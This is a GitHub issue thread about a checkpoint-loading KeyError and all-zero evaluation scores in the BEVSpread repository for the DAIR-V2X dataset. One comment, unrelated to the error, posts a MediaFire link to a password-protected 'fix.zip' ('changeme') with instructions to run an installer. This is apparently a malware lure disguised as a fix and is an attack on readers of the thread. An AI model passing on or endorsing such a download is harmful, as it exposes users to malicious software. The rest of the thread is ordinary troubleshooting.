### ISSUE TITLE
When Eval dair-v2x model with 1 GPU ,load model error !

### ISSUE THREAD

**Issue by knavezl** [DaTongjie/BEVSpread#7]
model_pth= ckpts/bev_spread_r101_256x256_100m.ckpt
Restoring states from the checkpoint path at ckpts/bev_spread_r101_256x256_100m.ckpt
Lightning automatically upgraded your loaded checkpoint from v1.5.10 to v1.9.0. To apply the upgrade to your files permanently, run `python -m pytorch_lightning.utilities.upgrade_checkpoint --file ckpts/bev_spread_r101_256x256_100m.ckpt`
2024-08-26 18:06:40,649 - root - INFO - DeformConv2dPack model.backbone.height_net.height_conv.4 is upgraded to version 2.
LOCAL_RANK: 0 - CUDA_VISIBLE_DEVICES: [0]
Traceback (most recent call last):
  File "exps/dair-v2x/bev_spread_r101_256x256_100m.py", line 418, in <module>
    run_cli()
  File "exps/dair-v2x/bev_spread_r101_256x256_100m.py", line 415, in run_cli
    main(args)
  File "exps/dair-v2x/bev_spread_r101_256x256_100m.py", line 382, in main
    trainer.test(model, ckpt_path=model_pth)
  File "/home/user/anaconda3/envs/streampetr/lib/python3.8/site-packages/pytorch_lightning/trainer/trainer.py", line 785, in test
    return call._call_and_handle_interrupt(
  File "/home/user/anaconda3/envs/streampetr/lib/python3.8/site-packages/pytorch_lightning/trainer/call.py", line 38, in _call_and_handle_interrupt
    return trainer_fn(*args, **kwargs)
  File "/home/user/anaconda3/envs/streampetr/lib/python3.8/site-packages/pytorch_lightning/trainer/trainer.py", line 834, in _test_impl
    results = self._run(model, ckpt_path=self.ckpt_path)
  File "/home/user/anaconda3/envs/streampetr/lib/python3.8/site-packages/pytorch_lightning/trainer/trainer.py", line 1099, in _run
    self._checkpoint_connector.restore_training_state()
  File "/home/user/anaconda3/envs/streampetr/lib/python3.8/site-packages/pytorch_lightning/trainer/connectors/checkpoint_connector.py", line 281, in restore_training_state
    self.restore_loops()
  File "/home/user/anaconda3/envs/streampetr/lib/python3.8/site-packages/pytorch_lightning/trainer/connectors/checkpoint_connector.py", line 352, in restore_loops
    self.trainer.test_loop.load_state_dict(state_dict["test_loop"])
KeyError: 'test_loop'

 your open-source model is the latest version?

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by knavezl** [comment]
> model_pth= ckpts/bev_spread_r101_256x256_100m.ckpt Restoring states from the checkpoint path at ckpts/bev_spread_r101_256x256_100m.ckpt Lightning automatically upgraded your loaded checkpoint from v1.5.10 to v1.9.0. To apply the upgrade to your files permanently, run `python -m pytorch_lightning.utilities.upgrade_checkpoint --file ckpts/bev_spread_r101_256x256_100m.ckpt` 2024-08-26 18:06:40,649 - root - INFO - DeformConv2dPack model.backbone.height_net.height_conv.4 is upgraded to version 2. LOCAL_RANK: 0 - CUDA_VISIBLE_DEVICES: [0] Traceback (most recent call last): File "exps/dair-v2x/bev_spread_r101_256x256_100m.py", line 418, in run_cli() File "exps/dair-v2x/bev_spread_r101_256x256_100m.py", line 415, in run_cli main(args) File "exps/dair-v2x/bev_spread_r101_256x256_100m.py", line 382, in main trainer.test(model, ckpt_path=model_pth) File "/home/user/anaconda3/envs/streampetr/lib/python3.8/site-packages/pytorch_lightning/trainer/trainer.py", line 785, in test return call._call_and_handle_interrupt( File "/home/user/anaconda3/envs/streampetr/lib/python3.8/site-packages/pytorch_lightning/trainer/call.py", line 38, in _call_and_handle_interrupt return trainer_fn(*args, **kwargs) File "/home/user/anaconda3/envs/streampetr/lib/python3.8/site-packages/pytorch_lightning/trainer/trainer.py", line 834, in _test_impl results = self._run(model, ckpt_path=self.ckpt_path) File "/home/user/anaconda3/envs/streampetr/lib/python3.8/site-packages/pytorch_lightning/trainer/trainer.py", line 1099, in _run self._checkpoint_connector.restore_training_state() File "/home/user/anaconda3/envs/streampetr/lib/python3.8/site-packages/pytorch_lightning/trainer/connectors/checkpoint_connector.py", line 281, in restore_training_state self.restore_loops() File "/home/user/anaconda3/envs/streampetr/lib/python3.8/site-packages/pytorch_lightning/trainer/connectors/checkpoint_connector.py", line 352, in restore_loops self.trainer.test_loop.load_state_dict(state_dict["test_loop"]) KeyError: 'test_loop'
> 
> your open-source model is the latest version?

I trained DAIR-V2X-I data by myself ,then this error disappear.but the evaluate result is not right :

2016 2016
bbox metric
bev metric
3d metric
Car AP@0.70, 0.70, 0.70:
bbox AP:0.0000, 0.0000, 0.0000
bev  AP:0.0000, 0.0000, 0.0000
3d   AP:0.0000, 0.0000, 0.0000
Car AP@0.70, 0.50, 0.50:
bbox AP:0.0000, 0.0000, 0.0000
bev  AP:0.0000, 0.0000, 0.0000
3d   AP:0.0000, 0.0000, 0.0000
Pedestrian AP@0.50, 0.50, 0.50:
bbox AP:0.0000, 0.0000, 0.0000
bev  AP:0.0000, 0.0000, 0.0000
3d   AP:0.0000, 0.0000, 0.0000
Pedestrian AP@0.50, 0.25, 0.25:
bbox AP:0.0000, 0.0000, 0.0000
bev  AP:0.0000, 0.0000, 0.0000
3d   AP:0.0000, 0.0000, 0.0000
Cyclist AP@0.50, 0.50, 0.50:
bbox AP:0.0000, 0.0000, 0.0000
bev  AP:0.0000, 0.0000, 0.0000
3d   AP:0.0000, 0.0000, 0.0000
Cyclist AP@0.50, 0.25, 0.25:
bbox AP:0.0000, 0.0000, 0.0000
bev  AP:0.0000, 0.0000, 0.0000
3d   AP:0.0000, 0.0000, 0.0000

Overall AP@easy, moderate, hard:
bbox AP:0.0000, 0.0000, 0.0000
bev  AP:0.0000, 0.0000, 0.0000
3d   AP:0.0000, 0.0000, 0.0000
